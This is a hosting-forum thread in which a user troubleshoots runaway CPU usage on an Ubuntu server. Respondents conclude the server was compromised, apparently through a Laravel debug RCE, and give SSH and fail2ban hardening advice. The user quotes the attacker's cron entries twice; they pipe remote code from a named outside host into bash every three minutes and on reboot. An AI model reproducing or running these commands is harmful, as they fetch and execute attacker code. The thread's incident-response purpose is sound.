How to find the reason behind sudden CPU max usage and server crash

apache ssh lamp

ab_in 5 years, 4 months ago

Scenario:
I have a 4 core CPU, 8GB Ram, Ubuntu 20.04 server. For the last few days my linode console shows a 400% CPU usage statistics and sends me threshold exceed warning emails.

I did see many users seems to have this high CPU usage issue and there are some posts in linode forums and other sites but I wasn't able to figure out the the reason behind this, with their suggestions and answers.

As per forum answers I run the HTOP command, TOP command etc and got the following results.
As I am not much familiar with Ubuntu I can't figure out what is "ssd: root@pts/1" command is and why it consumes too much CPU.

HTOP : screenshot

Also I can't figure out what does those the first 5 processes are and why they causing the high CPU usage.

Can any one point me to find what process is run by those commands?.

Info :

As it is a testing server, there is no considerable traffic at any point.(Maximum 1-2 users)(issue still there even when there is no traffic)
Apache access log and error log doesn't show any issues.

The who command returns:

abin     pts/0        2021-02-09 20:26 (xxx.xxx.xxx.xx)
abin     pts/1 2021-02-09 18:37 (xxx.xxx.xxx.xx)
abin     pts/2        2021-02-09 20:10 (xxx.xxx.xxx.xx)

/etc/crontab:

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

top screenshot

I have tried this forum suggestion and reduced the swappiness to a lower value. But it doesn't helped either.

If any additional data needed, let me know.

Any help will be appreciated. Thanks in advance

Edit:
ps -eo user=|sort|uniq -c :

7 abin
1 daemon
1 messagebus
1 mysql
114 root
1 sshd
1 syslog
1 systemd-network
1 systemd-resolve
1 systemd-timesync
355 www-data

and many processes are cumulating in 'www-data'

Additional Info:

There are too many login attempt logs in /var/log/auth.log.
var/log/syslog. [please note after Feb 18 11:41:50 there is not log until Feb 18 17:12:48]

Feb 18 11:41:50 ubuntu-xxx kernel: [758663.561513] oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),cpuset=/,mems_allowed=0,global_oom,task_memcg=/system.s>
Feb 18 11:41:50 ubuntu-xxx kernel: [758663.561525] Out of memory: Killed process 422931 (pgrep) total-vm:755444kB, anon-rss:500260kB, file-rss:2196kB, shmem-r>
Feb 18 11:41:50 ubuntu-xxx kernel: [758663.720846] oom_reaper: reaped process 422931 (pgrep), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
Feb 18 17:12:48 ubuntu-xxx kernel: [758718.889366] [ 365827]    33 365827     2191     1266    57344       36             0 bash

5 Replies

stevewi 5 years, 4 months ago

I can't offer much help for most of this because I don't have access to your Linode. However, there are a few things I can answer:

As I am not much familiar with Ubuntu

This may be your first problem. Ubuntu is just like any other Linux distro except for all the GUI and "phone-home" goodies you have to get rid of in order for it to work reasonably in a VPS environment (GUI desktops are worthless in a VPS environment -- because of network latency, all that fancy desktop stuff is so horribly slow that the utility of it is damn near at the limit of zero).

<shameless_bias>
If you don't want any of the stuff mentioned above, try Ubuntu's up-stream parent Debian 10 (Buster). The package management system is the same; the file layout is the same; and it doesn't have the crapola that Canonical makes you accept with Ubuntu that locks you into it. Of course, it doesn't get updated as often but, IMHO, that's a feature, not a bug (every release of Debian is, in Ubuntu parlance, an LTS -- long-term support -- release).
<shameless_bias/>

I can't figure out what is sshd: root@pts/1 command is and why it consumes too much CPU.

sshd(8) is the OpenSSH SSH daemon. It handles secure logins for ssh(1). root@pts/1 is the login/tty/session id for an ssh(1) login (this notation is universal to all Linuxen). If it's consuming a lot of CPU, then it's running some command as the super-user or handling a lot of login attempts.

DANGER WILL ROBINSON! DANGER! DANGER!

Your system may be compromised!

/usr/sbin/mysqld is the MySQL/MariaDB service daemon. It's the thing that provides database services for MySQL/MariaDB clients (Wordpress?). Something is hammering your database…most likely your web server.

and many processes are cumulating in 'www-data'

This is your web server. If this is a vanilla apache2(8)/php(1) installation, you are probably using the pre-fork MPM which spawns tons of processes. The pre-fork MPM is required if you use the apache2(8) module for PHP…as it's not thread-safe.

If you switch to php-fpm, you can use one of the multi-threaded MPMs -- event or worker…which spawn many fewer processes. Here's a guide on how to set that up on Ubuntu:

https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04

Don't worry if the PHP or Ubuntu versions mentioned don't match yours. The process is the same.

355 apache(2) processes indicates that someone is hammering your web server…or it's horribly mis-configured. Do you have a firewall rule that limits http(s) requests and drops attempts to violate those limits? If not, you should…

There are too many login attempt logs in /var/log/auth.log.

This is undoubtedly the result of dictionary attacks on your Linode by 'bots running on infected systems around the world. This is easily verified by looking up some of the IP addresses given in /var/log/auth.log at

https://ipinfo.io

Regular use of this service requires a subscription but casual, metered use is allowed. Too many/frequent lookups will result in a lockout from the service.

Welcome to life on the open internet!

I have tried this forum suggestion and reduced the swappiness to a lower value. But it doesn't helped either.

As you discovered, this was futile. Swappiness is not the source of your problems. According to the htop(1) screenshot you posted, you're only using about 10% of your available swap space and about a third of your available main memory.

I really think your system has been compromised by a bad actor. What I would do is shut it down and delete it and start over with a much more controlled bring-up…especially with respect to a firewall and sshd(8)/ssh(1). See:

https://linuxize.com/post/how-to-enable-ssh-on-ubuntu-20-04/

Make sure your ssh(1) does not allow root logins and accepts certificate authentication only. Set the following in /etc/ssh/sshd_config

PermitRootLogin no
PasswordAuthentication no

once you get your certs set up:

https://www.garron.me/en/go2linux/ssh-public-key-only-login-authentication.html

That won't stop the attacks but it will make sure they don't succeed (no cert, no access).

To mitigate the attacks, set up fail2ban(1):

https://linuxhandbook.com/fail2ban-basic/

Be aggressive about banning IP addresses for failed logins (here's mine):

...
# bans are for 30 days
#

bantime = 30d
...

[sshd]

enabled  = true
mode     = extra
port     = ssh
filter   = sshd[mode=aggressive]
logpath  = /var/log/auth.log
maxretry = 1
# ...in 5 minutes
#
findtime = 300

The crash was probably because you ran out of entries in your process table. This explains what the process table is:

https://stackoverflow.com/questions/4880555/what-is-the-linux-process-table-what-does-it-consist-of

I hope this helps.

-- sw

Tntdruid 5 years, 4 months ago

you can save the server from crashing whit low mem whit:

vm.overcommit_memory = 2 in your /etc/sysctl.conf

https://engineering.pivotal.io/post/virtual_memory_settings_in_linux_-_the_problem_with_overcommit/

ab_in 5 years, 4 months ago

Hello @stevewi, Thank you very much for the extensive answer.

[Currently, I do have two instances with this same issue.]

As you noted I was using pre-fork MPM and I did switch to the MPM Event and PHP-FPM based on the link you provided in both instances.
The first linode seems to be working normally[till last edit]. but the second one still shows the issue.
See this new htop screenshot after the changes, www-data still have many processes running.

Also the /var/log/auth.log has the following cron auth log which seems suspicious.

Feb 23 05:09:01 ubuntu-ap-west-001-LIVE1 CRON[8518]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 23 05:09:01 ubuntu-ap-west-001-LIVE1 CRON[8519]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Feb 23 05:09:01 ubuntu-ap-west-001-LIVE1 CRON[8518]: pam_unix(cron:session): session closed for user root

Cron runs in every 5 minutes. [I haven't set up any.]

The sudo crontab -l -u www-data command shows the following

*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1614034840" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -O - | bash
@reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1614034840" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -O - | bash

Does this confirm a breach? How can I remove these?

Most Probable reason : https://www.ambionics.io/blog/laravel-debug-rce

https://ipinfo.io

The login attempts are from across the globe.

PermitRootLogin no
PasswordAuthentication no

I have already done this on both linodes.

To mitigate the attacks, set up fail2ban(1):

Fail2ban activated.

ab_in 5 years, 4 months ago

Thank you all for the answers.
As per others' suggestions and my observation, the system seems to have compromised. And I chose to delete the linodes and create a new one with provided security measures.

Most probable vulnarability: https://www.ambionics.io/blog/laravel-debug-rce

Some crons were created by the affected system.

*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1614034840" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -O - | bash
@reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1614034840" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1614034840" -q -O - | bash

and there are too many files were created under the /tmp directory.

stevewi 5 years, 4 months ago

You write:

Some crons were created by the affected system.

This is only one crontab(5) entry… Everything after */3 * * * * is the command (which runs every 3 minutes). I took a look at what's at

http://repo1.criticalnumeric.tech/init

and it definitely looks like the work of a bad actor. Every run of the cron(8) job probably updates the job with a new time=xxxxxxxx parameter.

So, what I would do is bring up a new Linode with a firewall configuration that BLOCKS EVERYTHING. At first you'll have to interact with it through the console using lish/glish.

Get all the certificates & stuff for ssh(1)/sshd(8) set up and then open port 2222 in your firewall. Test. When it all works, set up fail2ban(1).

Close port 2222, modify your ssh(1)/sshd(8) configuration to use port 22 and open port 22. At this point the dictionary attacks will resume but every attempt will fail and fail2ban(1) will now catch the failures (and, presumably block the attacker's IP address for the banTime).

Now you have a reasonably secure system that you can log into remotely, slowly bring up the other services you need (http(s), ntp, etc)…making sure that they are appropriately configured in your firewall to disallow the excessive, persistent access you saw before. If you use Laravel, make sure that debug mode is permanently disabled (if you need to debug your site, bring it up on another, local machine and debug it there).

Modify fail2ban(1) configuration appropriately. Set up bad 'bot protection on your web server appropriately. See here.

Change your root password. Set up sudo(8). Make sure root can't login remotely. You should be all set…

-- sw

Reply

Description

Please enter an answer

Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Compute

Storage

Networking

Databases

Services

Solutions

Pricing

Library

Technical Resources

Community

Marketplace

What's New

How to find the reason behind sudden CPU max usage and server crash

5 Replies

Reply

Tips: